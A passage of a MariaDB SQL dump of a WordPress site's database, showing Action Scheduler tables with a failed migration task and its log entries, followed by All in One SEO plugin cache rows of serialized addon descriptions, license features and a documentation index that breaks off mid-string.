-- MariaDB dump 10.19  Distrib 10.11.3-MariaDB, for Win64 (AMD64)
--
-- Host: localhost    Database: wp_z9oyc
-- ------------------------------------------------------
-- Server version	10.3.39-MariaDB

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `dnctiavkr_actionscheduler_actions`
--

DROP TABLE IF EXISTS `dnctiavkr_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) NOT NULL,
  `status` varchar(20) NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) DEFAULT NULL,
  `schedule` longtext DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=3613 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_actionscheduler_actions`
--

LOCK TABLES `dnctiavkr_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `dnctiavkr_actionscheduler_actions` VALUES
(3602,'action_scheduler/migration_hook','failed','2023-08-23 08:20:21','2023-08-23 08:20:21','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1692778821;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1692778821;}',1,1,'2023-08-23 08:20:27','2023-08-23 08:20:27',0,NULL);
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_actionscheduler_claims`
--

DROP TABLE IF EXISTS `dnctiavkr_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=148032 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_actionscheduler_claims`
--

LOCK TABLES `dnctiavkr_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_actionscheduler_groups`
--

DROP TABLE IF EXISTS `dnctiavkr_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_actionscheduler_groups`
--

LOCK TABLES `dnctiavkr_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `dnctiavkr_actionscheduler_groups` VALUES
(1,'action-scheduler-migration'),
(2,'wpforms');
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_actionscheduler_logs`
--

DROP TABLE IF EXISTS `dnctiavkr_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=883 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_actionscheduler_logs`
--

LOCK TABLES `dnctiavkr_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `dnctiavkr_actionscheduler_logs` VALUES
(838,3602,'action created','2023-08-23 08:19:21','2023-08-23 08:19:21'),
(839,3602,'action started via WP Cron','2023-08-23 08:20:27','2023-08-23 08:20:27'),
(840,3602,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-08-23 08:20:27','2023-08-23 08:20:27');
/*!40000 ALTER TABLE `dnctiavkr_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_aioseo_cache`
--

DROP TABLE IF EXISTS `dnctiavkr_aioseo_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_aioseo_cache` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `key` varchar(80) NOT NULL,
  `value` longtext NOT NULL,
  `expiration` datetime DEFAULT NULL,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `ndx_aioseo_cache_key` (`key`),
  KEY `ndx_aioseo_cache_expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=25 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_aioseo_cache`
--

LOCK TABLES `dnctiavkr_aioseo_cache` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_aioseo_cache` DISABLE KEYS */;
INSERT INTO `dnctiavkr_aioseo_cache` VALUES
(1,'addons','a:8:{i:0;O:8:\"stdClass\":15:{s:3:\"sku\";s:16:\"aioseo-redirects\";s:4:\"name\";s:19:\"Redirection Manager\";s:7:\"version\";s:6:\"1.2.12\";s:5:\"image\";N;s:4:\"icon\";s:480:\"PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgY2xhc3M9ImFpb3Nlby1yZWRpcmVjdCI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGQ9Ik0xMC41OSA5LjE3TDUuNDEgNEw0IDUuNDFMOS4xNyAxMC41OEwxMC41OSA5LjE3Wk0xNC41IDRMMTYuNTQgNi4wNEw0IDE4LjU5TDUuNDEgMjBMMTcuOTYgNy40NkwyMCA5LjVWNEgxNC41Wk0xMy40MiAxNC44MkwxNC44MyAxMy40MUwxNy45NiAxNi41NEwyMCAxNC41VjIwSDE0LjVMMTYuNTUgMTcuOTVMMTMuNDIgMTQuODJaIiBmaWxsPSJjdXJyZW50Q29sb3IiIC8+PC9zdmc+\";s:6:\"levels\";a:4:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:101:\"<p>Our Redirection Manager allows you to create and manage redirects for 404s or modified posts.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:48:\"https://aioseo.com/features/redirection-manager/\";s:12:\"learnMoreUrl\";s:48:\"https://aioseo.com/features/redirection-manager/\";s:9:\"manageUrl\";s:30:\"https://route#aioseo-redirects\";s:8:\"features\";a:1:{i:0;O:8:\"stdClass\":2:{s:13:\"license_level\";s:5:\"elite\";s:7:\"feature\";s:19:\"404-parent-redirect\";}}}i:1;O:8:\"stdClass\":15:{s:3:\"sku\";s:21:\"aioseo-link-assistant\";s:4:\"name\";s:14:\"Link Assistant\";s:7:\"version\";s:6:\"1.0.16\";s:5:\"image\";N;s:4:\"icon\";s:516:\"PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGQ9Ik0xMSAxNUg3QzUuMzUgMTUgNCAxMy42NSA0IDEyQzQgMTAuMzUgNS4zNSA5IDcgOUgxMVY3SDdDNC4yNCA3IDIgOS4yNCAyIDEyQzIgMTQuNzYgNC4yNCAxNyA3IDE3SDExVjE1Wk0xNyA3SDEzVjlIMTdDMTguNjUgOSAyMCAxMC4zNSAyMCAxMkMyMCAxMy42NSAxOC42NSAxNSAxNyAxNUgxM1YxN0gxN0MxOS43NiAxNyAyMiAxNC43NiAyMiAxMkMyMiA5LjI0IDE5Ljc2IDcgMTcgN1pNMTYgMTFIOFYxM0gxNlYxMVoiIGZpbGw9ImN1cnJlbnRDb2xvciIvPjwvc3ZnPgo=\";s:6:\"levels\";a:3:{i:0;s:6:\"agency\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:283:\"<p>Super-charge your SEO with Link Assistant! Get relevant suggestions for adding internal links to older content as well as finding any orphaned posts that have no internal links. Use our reporting feature to see all link suggestions or add them directly from any page or post.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:39:\"https://aioseo.com/docs/link-assistant/\";s:12:\"learnMoreUrl\";s:39:\"https://aioseo.com/docs/link-assistant/\";s:9:\"manageUrl\";s:35:\"https://route#aioseo-link-assistant\";s:8:\"features\";a:0:{}}i:2;O:8:\"stdClass\":15:{s:3:\"sku\";s:20:\"aioseo-video-sitemap\";s:4:\"name\";s:13:\"Video Sitemap\";s:7:\"version\";s:6:\"1.1.13\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:5:{i:0;s:10:\"individual\";i:1;s:8:\"business\";i:2;s:6:\"agency\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:243:\"<p>The Video Sitemap works in much the same way as the XML Sitemap module, it generates an XML Sitemap specifically for video content on your site. Search engines use this information to display rich snippet information in search results.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:54:\"https://aioseo.com/docs/how-to-create-a-video-sitemap/\";s:12:\"learnMoreUrl\";s:54:\"https://aioseo.com/docs/how-to-create-a-video-sitemap/\";s:9:\"manageUrl\";s:43:\"https://route#aioseo-sitemaps:video-sitemap\";s:8:\"features\";a:0:{}}i:3;O:8:\"stdClass\":15:{s:3:\"sku\";s:21:\"aioseo-local-business\";s:4:\"name\";s:18:\"Local Business SEO\";s:7:\"version\";s:6:\"1.2.18\";s:5:\"image\";N;s:4:\"icon\";s:18:\"svg-local-business\";s:6:\"levels\";a:5:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:4:\"plus\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:253:\"<p>Local Business schema markup enables you to tell Google about your business, including your business name, address and phone number, opening hours and price range. This information may be displayed as a Knowledge Graph card or business carousel.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:43:\"https://aioseo.com/docs/local-business-seo/\";s:12:\"learnMoreUrl\";s:43:\"https://aioseo.com/docs/local-business-seo/\";s:9:\"manageUrl\";s:40:\"https://route#aioseo-local-seo:locations\";s:8:\"features\";a:0:{}}i:4;O:8:\"stdClass\":15:{s:3:\"sku\";s:19:\"aioseo-news-sitemap\";s:4:\"name\";s:12:\"News Sitemap\";s:7:\"version\";s:6:\"1.0.15\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:4:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:284:\"<p>Our Google News Sitemap lets you control which content you submit to Google News and only contains articles that were published in the last 48 hours. In order to submit a News Sitemap to Google, you must have added your site to Google’s Publisher Center and had it approved.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:60:\"https://aioseo.com/docs/how-to-create-a-google-news-sitemap/\";s:12:\"learnMoreUrl\";s:60:\"https://aioseo.com/docs/how-to-create-a-google-news-sitemap/\";s:9:\"manageUrl\";s:42:\"https://route#aioseo-sitemaps:news-sitemap\";s:8:\"features\";a:0:{}}i:5;O:8:\"stdClass\":15:{s:3:\"sku\";s:16:\"aioseo-index-now\";s:4:\"name\";s:8:\"IndexNow\";s:7:\"version\";s:6:\"1.0.11\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:6:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:5:\"basic\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";i:5;s:5:\"elite\";}s:13:\"currentLevels\";a:4:{i:0;s:5:\"basic\";i:1;s:4:\"plus\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:193:\"<p>Add IndexNow support to instantly notify search engines when your content has changed. This helps the search engines to prioritize the changes on your website and helps you rank faster.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:28:\"https://aioseo.com/index-now\";s:12:\"learnMoreUrl\";s:28:\"https://aioseo.com/index-now\";s:9:\"manageUrl\";s:45:\"https://route#aioseo-settings:webmaster-tools\";s:8:\"features\";a:0:{}}i:6;O:8:\"stdClass\":15:{s:3:\"sku\";s:15:\"aioseo-rest-api\";s:4:\"name\";s:8:\"REST API\";s:7:\"version\";s:5:\"1.0.5\";s:5:\"image\";N;s:4:\"icon\";s:280:\"PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgY2xhc3M9ImFpb3Nlby1jb2RlIj48cGF0aCBkPSJNOS40IDE2LjZMNC44IDEybDQuNi00LjZMOCA2bC02IDYgNiA2IDEuNC0xLjR6bTUuMiAwbDQuNi00LjYtNC42LTQuNkwxNiA2bDYgNi02IDYtMS40LTEuNHoiIGZpbGw9ImN1cnJlbnRDb2xvciIvPjwvc3ZnPg==\";s:6:\"levels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:137:\"<p>Manage your post and term SEO meta via the WordPress REST API. This addon also works seamlessly with headless WordPress installs.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:36:\"https://aioseo.com/feature/rest-api/\";s:12:\"learnMoreUrl\";s:36:\"https://aioseo.com/feature/rest-api/\";s:9:\"manageUrl\";s:0:\"\";s:8:\"features\";a:0:{}}i:7;O:8:\"stdClass\":15:{s:3:\"sku\";s:16:\"aioseo-image-seo\";s:4:\"name\";s:9:\"Image SEO\";s:7:\"version\";s:5:\"1.1.9\";s:5:\"image\";N;s:4:\"icon\";s:13:\"svg-image-seo\";s:6:\"levels\";a:5:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:4:\"plus\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:148:\"<p>Globally control the Title attribute and Alt text for images in your content. These attributes are essential for both accessibility and SEO.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:71:\"https://aioseo.com/docs/using-the-image-seo-features-in-all-in-one-seo/\";s:12:\"learnMoreUrl\";s:71:\"https://aioseo.com/docs/using-the-image-seo-features-in-all-in-one-seo/\";s:9:\"manageUrl\";s:44:\"https://route#aioseo-search-appearance:media\";s:8:\"features\";a:0:{}}}','2023-08-14 02:11:18','2023-08-13 02:11:18','2023-08-13 02:11:18'),
(2,'attachment_url_to_post_id_d99ed2ddbeefba28910cca4100f73b401b38bc49','s:4:\"none\";','2023-08-14 02:11:23','2023-08-13 02:11:23','2023-08-13 02:11:23'),
(3,'admin_notifications_update','i:1691979093;','2023-08-14 02:11:33','2023-08-13 02:11:33','2023-08-13 02:11:33'),
(4,'license_features','a:21:{i:0;O:8:\"stdClass\":3:{s:13:\"license_level\";s:3:\"pro\";s:7:\"section\";s:6:\"schema\";s:7:\"feature\";s:5:\"event\";}i:1;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:6:\"schema\";s:7:\"feature\";s:5:\"event\";}i:2;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:6:\"schema\";s:7:\"feature\";s:11:\"job-posting\";}i:3;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:5:\"tools\";s:7:\"feature\";s:29:\"network-tools-site-activation\";}i:4;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:5:\"tools\";s:7:\"feature\";s:22:\"network-tools-database\";}i:5;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:5:\"tools\";s:7:\"feature\";s:27:\"network-tools-import-export\";}i:6;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:5:\"tools\";s:7:\"feature\";s:20:\"network-tools-robots\";}i:7;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:14:\"seo-statistics\";}i:8;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:16:\"keyword-rankings\";}i:9;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:22:\"keyword-rankings-pages\";}i:10;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:11:\"post-detail\";}i:11;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:22:\"post-detail-page-speed\";}i:12;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:26:\"post-detail-seo-statistics\";}i:13;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:20:\"post-detail-keywords\";}i:14;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:31:\"post-detail-focus-keyword-trend\";}i:15;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:16:\"keyword-tracking\";}i:16;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:28:\"post-detail-keyword-tracking\";}i:17;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:17:\"search-statistics\";s:7:\"feature\";s:16:\"content-rankings\";}i:18;O:8:\"stdClass\":3:{s:13:\"license_level\";s:5:\"elite\";s:7:\"section\";s:13:\"seo-revisions\";s:7:\"feature\";s:12:\"revisions:-1\";}i:19;O:8:\"stdClass\":3:{s:13:\"license_level\";s:3:\"pro\";s:7:\"section\";s:13:\"seo-revisions\";s:7:\"feature\";s:12:\"revisions:30\";}i:20;O:8:\"stdClass\":3:{s:13:\"license_level\";s:4:\"plus\";s:7:\"section\";s:13:\"seo-revisions\";s:7:\"feature\";s:12:\"revisions:15\";}}','2023-08-14 02:11:53','2023-08-13 02:11:53','2023-08-13 02:11:53'),
(5,'admin_help_docs','s:71569:\"{\"categories\":{\"getting-started\":\"Getting Started\",\"advanced-settings\":\"Advanced Settings\",\"display-settings\":\"Display Settings\",\"general-seo-topics\":\"General SEO Topics\",\"feature-manager\":\"Feature Manager\",\"installation\":\"Installation\"},\"docs\":{\"200603\":{\"title\":\"Viewing Detailed Search Statistics For Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/viewing-detailed-search-statistics-for-your-content\\/\",\"categories\":[\"search-statistics\"]},\"200304\":{\"title\":\"Tracking Changes to Your SEO Using SEO Revisions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/tracking-changes-to-your-seo-using-seo-revisions\\/\",\"categories\":[\"seo-revisions\"]},\"188167\":{\"title\":\"WPCode Snippet Library\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/wpcode-snippet-library\\/\",\"categories\":[\"tools\"]},\"186946\":{\"title\":\"aioseo_hide_version_number\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_hide_version_number\\/\",\"categories\":[\"filter-hooks\"]},\"178887\":{\"title\":\"Setting the Primary Term for Breadcrumbs\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-primary-term-for-breadcrumbs\\/\",\"categories\":[\"breadcrumbs\"]},\"178727\":{\"title\":\"Using Broken Link Checker to Find and Fix Broken Links and Images\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-broken-link-checker-to-find-and-fix-broken-links-and-images\\/\",\"categories\":[\"broken-link-checker\"]},\"163922\":{\"title\":\"aioseo_schema_json_flags\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_schema_json_flags\\/\",\"categories\":[\"developer-documentation\"]},\"163519\":{\"title\":\"Using OpenAI to Generate SEO Titles and Meta Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-openai-to-generate-seo-titles-and-meta-descriptions\\/\",\"categories\":[]},\"145363\":{\"title\":\"Using the Search Statistics in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-search-statistics-in-all-in-one-seo\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"145281\":{\"title\":\"Connecting Search Statistics to Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/connecting-search-statistics-to-google-search-console\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"139798\":{\"title\":\"Checking Your SEO Using the SEO Preview\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/checking-your-seo-using-the-seo-preview\\/\",\"categories\":[\"facebook-settings\",\"post-page-settings\",\"seo-preview\",\"truseo\",\"twitter-settings\"]},\"136509\":{\"title\":\"aioseo_sitemap_lastmod_disable\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_sitemap_lastmod_disable\\/\",\"categories\":[\"filter-hooks\"]},\"135249\":{\"title\":\"aioseo_sitemap_rss\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_sitemap_rss\\/\",\"categories\":[\"developer-documentation\"]},\"133251\":{\"title\":\"aioseo_user_profile_tab_disable\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_user_profile_tab_disable\\/\",\"categories\":[\"filter-hooks\"]},\"131885\":{\"title\":\"Setting Web Page Schema Markup in Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-web-page-schema-markup-in-your-content\\/\",\"categories\":[\"schema-settings\"]},\"129515\":{\"title\":\"Editing the .htaccess file Using All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/editing-the-htaccess-file-using-all-in-one-seo\\/\",\"categories\":[\"file-editor\",\"tools\"]},\"124292\":{\"title\":\"Using the Emojis in Titles and Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-emojis-in-titles-and-descriptions\\/\",\"categories\":[\"facebook-settings\",\"post-page-settings\",\"search-appearance\",\"social-networks\",\"twitter-settings\"]},\"123164\":{\"title\":\"Google Permissions for the AIOSEO Google Search Console Integration\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/google-permissions-for-oauth\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"112137\":{\"title\":\"Setting the Schema Type for Individual Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-schema-type-for-individual-content\\/\",\"categories\":[\"schema-settings\"]},\"112145\":{\"title\":\"Configuring the Schema Settings in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/configuring-the-schema-settings-in-all-in-one-seo\\/\",\"categories\":[\"schema-settings\"]},\"112153\":{\"title\":\"A Guide to Schema.org Markup for Rich Snippets\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/a-guide-to-schema-org-markup-for-rich-snippets\\/\",\"categories\":[\"schema-settings\"]},\"112438\":{\"title\":\"Creating Reusable Schema Templates in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/creating-reusable-schema-templates-in-all-in-one-seo\\/\",\"categories\":[\"schema-settings\"]},\"112428\":{\"title\":\"Creating Custom Schema Markup with All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/creating-custom-schema-markup-with-all-in-one-seo\\/\",\"categories\":[\"schema-settings\"]},\"112889\":{\"title\":\"Setting Event Schema Markup in Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-event-schema-markup-in-your-content\\/\",\"categories\":[\"schema-settings\"]},\"112735\":{\"title\":\"Setting Dataset Schema Markup in Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-dataset-schema-markup-in-your-content\\/\",\"categories\":[\"schema-settings\"]},\"112711\":{\"title\":\"Setting Article Schema Markup in Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-article-schema-markup-in-your-content\\/\",\"categories\":[\"schema-settings\"]},\"112164\":{\"title\":\"Setting Course Schema Markup in Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-course-schema-markup-in-your-content\\/\",\"categories\":[\"schema-settings\"]},\"112933\":{\"title\":\"Setting Job Posting Schema Markup in Your 